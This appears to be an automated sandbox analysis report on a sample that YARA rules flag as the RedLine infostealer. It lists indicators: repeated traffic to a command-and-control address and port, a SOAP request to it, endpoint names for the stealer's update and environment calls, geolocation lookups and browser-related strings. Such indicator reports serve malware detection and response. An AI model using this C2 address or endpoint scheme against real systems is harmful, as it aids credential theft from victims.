                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.36:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.000000000311A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.36:5
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.36:55615
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.36:55615/
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.36:55615t-oq
                  Source: Uv4EriqDCj.exe, nXUcBcEOyROdbV.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: Uv4EriqDCj.exe, nXUcBcEOyROdbV.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861851189.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adob/1.0/_
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861851189.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.0/xmp
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861851189.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsoft.co2/t/Re
                  Source: Uv4EriqDCj.exe, nXUcBcEOyROdbV.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1750602650.0000000002B9B000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000A.00000002.1790379285.00000000026DB000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.000000000311A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.000000000311A000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                  Source: Uv4EriqDCj.exe, Uv4EriqDCj.exe, 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                  Source: Uv4EriqDCj.exeString found in binary or memory: https://api.ipify.orgcoo
                  Source: Uv4EriqDCj.exe, Uv4EriqDCj.exe, 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Uv4EriqDCj.exe, Uv4EriqDCj.exe, 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: Uv4EriqDCj.exe, nXUcBcEOyROdbV.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443

                  System Summary

                  barindex
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000000.00000002.1751899883.000000000448A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000000.00000002.1751899883.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: Uv4EriqDCj.exe PID: 4340, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: Uv4EriqDCj.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7484, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Uv4EriqDCj.exe, EntryForm.csLarge array initialization: : array initializer size 606777
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_04F015240_2_04F01524
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_04F03B400_2_04F03B40
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AA62600_2_05AA6260
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AA62500_2_05AA6250
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AA7E980_2_05AA7E98
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AA5E280_2_05AA5E28
